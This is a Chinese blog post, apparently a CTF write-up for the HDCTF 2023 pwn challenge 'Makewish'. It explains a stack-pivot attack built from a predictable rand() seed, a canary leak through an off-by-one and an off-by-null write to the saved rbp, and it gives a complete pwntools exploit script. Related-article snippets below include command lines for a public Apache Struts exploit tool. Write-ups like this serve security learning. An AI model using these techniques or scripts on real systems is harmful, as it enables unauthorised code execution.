【PWN · 栈迁移|off-by-one|伪随机|爆破】[HDCTF 2023]Makewish

最新推荐文章于 2024-11-01 18:23:17 发布
最新推荐文章于 2024-11-01 18:23:17 发布
阅读量327 收藏 1
点赞数
分类专栏: 【PWN · 高级栈相关】 文章标签: linux ctf pwn 栈迁移 StackOverflow
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Mr_Fmnwon/article/details/134194060
版权

一道精巧、包含很多要点的题目

一、题目

二、思路浅析

通过ctypes酷通过伪随机数检测,没用srand指定随机种子时,默认srand(1)。

通过puts_name的off-by-one来泄露canary

进入vuln时,发现只能刚好填充到rbp前面,但是会将最后一个字符的下一个字节置为0

——可以通过off-by-null来覆写main_rbp的低字节为0,而vuln函数后面程序退出,两次leave;ret,构成栈迁移,且往低地址迁移,一定概率落在覆写的“wish”字符串中。通过爆破多试几次即可。

三、exp

from pwn import *
from ctypes import *
context(arch='amd64',log_level='debug')

libc=cdll.LoadLibrary('/root/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so')

# gdb.attach(io)
# raw_input()
while(1):
    io=remote('node4.anna.nssctf.cn',28895)
    io.recvuntil(b'name\n\n')
    io.sendline(b'a'*39+b'b')
    io.recvuntil(b'aaab')
    canary=u64(io.recv(8))-0x0a
    success(hex(canary))

    libc.srand(1)
    num=libc.rand()%1000+324
    io.send(p32(num))

    io.recvuntil(b'can make a wish to me\n')
    raw_input()
    backdoor=0x4007C7
    payload=p64(backdoor)*11+p64(canary)
    io.send(payload)
    raw_input()

    io.interactive()

Mr_Fmnwon
关注
专栏目录
pwn学习】堆溢出(四)- off-by-one 漏洞
Morphy_Amo的博客
02-16 1130
off-by-one 漏洞 前置学习 【pwn学习】堆溢出(一) 【pwn学习】堆溢出(二)- First Fit 【pwn学习】堆溢出(三)- Unlink和UAF off-by-one是一种特殊的溢出漏洞,指只溢出一个字节的情况。 造成原因 造成off-by-one的原因常常是因为边界验证不充分。 循环写入时,循环次数设置错误导致多写入了一个字节; 字符串操作有误; strlen 是我们很熟悉的计算 ascii 字符串长度的函数,这个函数在计算字符串长度时是不把结束符 '\x00' 计算
pwn 堆入门之off by one
清霂的博客
04-18 255
目录Asis CTF 2016 b00ks Asis CTF 2016 b00ks #!/usr/bin/env python2 from pwn import * arch = "amd64" filename = "b00ks" context(os="linux", arch=arch, log_level="debug") content = 0 offset = 0 # elf elf = ELF(filename) menu_addr=0x0000000000000A89 free_got
CTF-PWN-堆- 【off-by-one】
llovewuzhengzi的博客
11-18 514
(2)可以利用同时构造pre_size和对应的NULL字节溢出,然后unlink时合并,此方法的关键在于 unlink 的时候没有检查按照 prev_size 找到的块的大小与prev_size 是否一致。两坨空间:off_202010和0ff_202018分别存储着偏移202060和202040的地址,偏移202060对应的是author name的,偏移202040对应的是第三类堆块的地址。7将虚假chunk的部位设置为某位置的地址即可得到该地址的内容,再次利用printf导致泄露,从而知道函数地址。
pwn-堆溢出off-by-one
CharlesGodX的博客
04-17 1860
Thunder_J@Thunder_J-virtual-machine:~/桌面$ python exp.py [+] Starting local process './Storm_note': pid 16030 [*] '/home/Thunder_J/\xe6\xa1\x8c\xe9\x9d\xa2/Storm_note' Arch: amd64-64-little ...
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 360
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
PWN入门之迁移-附件资源
03-02
PWN入门之迁移-附件资源
Python库 | pwn-machine-1.1.tar.gz
03-11
Python库“pwn-machine-1.1.tar.gz”是一个用于网络安全和漏洞利用开发的工具集。这个库专门针对那些对安全研究和逆向工程感兴趣的开发者和爱好者。在Python中,库是可重用代码的集合,它使得程序员能够快速地构建...
struts-pwn:Apache Struts CVE-2017-5638的漏洞利用
05-18
python struts-pwn.py --list 'urls.txt' -c 'id' 检查针对单个URL的漏洞是否存在。 python struts-pwn.py --check --url 'http://example.com/struts2-showcase/index.action' 根据URL列表检查漏洞是否存在。 ...
pwn刷题num47---off by one 修改size大小,造成堆块重叠,控制chunk内容指针,泄露函数真实地址,修改got表,调用system
tbsqigongzi的博客
05-04 515
BUUCTF-PWN-hitcontraining_heapcreator 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 64位程序,小端序 开启部分RELRO-----got表仍可写 开启canary保护-----溢出需绕过canary 开启NX保护-----堆不可执行 未开启PIE----函数地址为真实地址 动态链接 运行一下试试 功能基本上就是 1. 创建堆 2. 编辑堆 3.显示堆 4.删除堆 5.退出 ida看一下伪代码 主函数就是根据选择调用不
HDCTF 2023 复现
weixin_63231007的博客
07-11 1410
web yaml反序列化&quine注入&Apache SCXML2 RCE pwn 迁移&格式化字符串 crypto RSA
glibc2.31 off-by-null orw 攻击手法刨析
qq_39948058的博客
08-26 926
前言:复习一下glibc2.31版本的orw手法,largebin的残留信息进行unlik,随便弄个题来写的刨析,嘿嘿, 仅large bin chunk的堆块伪造,并即可实现堆块重叠 并large bin attack 任意写攻击TLS结构体中的存放tcache结构体指针的位置,从而可以伪造tcache bin结构体进行任意构造 再通过上述demo任意写控制参数,从而在assert后即可进行迁移 glibc2.31 off-by-null orw 攻击手法刨析 Free(3) 3---->un
canary介绍与绕过技巧
0pt1mus
04-02 7256
Canary 介绍 Canary 的意思是金丝雀,来源于英国矿井工人用来探查井下气体是否有毒的金丝雀笼子。工人们每次下井都会带上一只金丝雀。如果井下的气体有毒,金丝雀由于对毒性敏感就会停止鸣叫甚至死亡,从而使工人们得到预警。 我们知道,通常溢出的利用方式是通过溢出存在于上的局部变量,从而让多出来的数据覆盖 ebp、eip 等,从而达到劫持控制流的目的。溢出保护是一种缓冲区溢出攻击缓解手段,当...
Linux下堆漏洞利用(off-by-one)
nibiru_holmes的博客
03-14 8677
一个字节溢出被称为off-by-one,曾经的一段时间里,off-by-one被认为是不可以利用的,但是后来研究发现在堆上哪怕只有一个字节的溢出也会导致任意代码的执行。同时堆的off-by-one利用也出现在国内外的各类CTF竞赛中,但是在网络上还不能找到一篇系统的介绍堆off-by-one利用的教程。在这篇文章中我列出了5种常见的堆上的off-by-one攻击方式,并且给出了测试DEMO,测试的
堆溢出off-by-one(asis-ctf-2016 pwn 之 b00ks)
九层台
08-01 2385
这些天积累也知道了一些关于glibc内存的分配策略。 说pwn 是在内存里捉迷藏其实到这里才真正接触大片的内存。精确控制就能保证精确修改数据。 需要的一个很重要的能力就是跟内存的能力。 这里调试exp用gdb.attach(p)来下断点,弹出调试界面。跟踪内存。 用gdb的x命令/xg参数来查看内存以十六进制8字节显示。 这个程序开启了PIE跟踪不太容易,不过可以用find命令查找输入的...
堆溢出----Off-By-One
qq_42192672的博客
10-22 3507
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/heap/off_by_one/#_5 off-by-one 指程序向缓冲区中写入时,写入的字节数超过了这个缓冲区本身所申请的字节数并且只越界了一个字节,emmm 看一下CTFWIKI给的第一个例子(循环边界) int my_gets(char *ptr,int size) { i...
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2234
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
快速入门堆溢出技巧(OFF BY ONE)
蚁景网安学院
05-10 598
OFF BY ONE所谓OFF BY ONE就是利用堆溢出一个字节到下一个堆块,使得目前堆块与下一堆块合并成一个堆块,此时堆块的大小就是我们溢出的那一字节并且堆块的fd(前驱指针)以及bk...
Linux 之 信号概念、进程、进程间通信、线程、线程同步
挥剑决浮云的博客
11-01 418
如果释放互斥锁时有一个以上的线程阻塞,那么这些阻塞的线程会被唤醒,它们都会尝试对互斥锁进行加锁,当有一个线程成功对互斥锁上锁之后,其它线程就不能再次上锁了,只能再次陷入阻塞,等待下一次解锁。事实上,子进程是父进程的一个副本,譬如子进程拷贝了父进程的数据段、堆、以及继承了父进程打开的文件描述符,父进程与子进程并不共享这些存储空间,这是子进程对父进程相应部分存储空间的完全复制,执行fork()之后,每个进程均可修改各自的数据以及堆段中的变量,而并不影响另一个进程。是一族函数,而不是一个单独的函数。
Linux 』网络传输层 - TCP(二)
最新发布
小侯宝的博客
11-01 585
为什么是三次握手三次握手是TCP为了保证双方通信时具有可靠性所定制的一种策略;而三次握手可以确保客户端和服务端至少都向对方发送了一次消息,从而确保连接建立的更为可靠;以朴素的角度来看三次握手实际上也可以被解析成四次握手;但为了提升连接创建的效率,TCP采用捎带应答的策略,在第二次握手中将ACK报文与SYN报文整合成了一个报文,即为SYN+ACK报文;在三次握手中能够确保双端都对对方进行一次消息的发送以及消息的接收来确保连接的稳定,因此三次握手中任何一次握手都不能少;
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值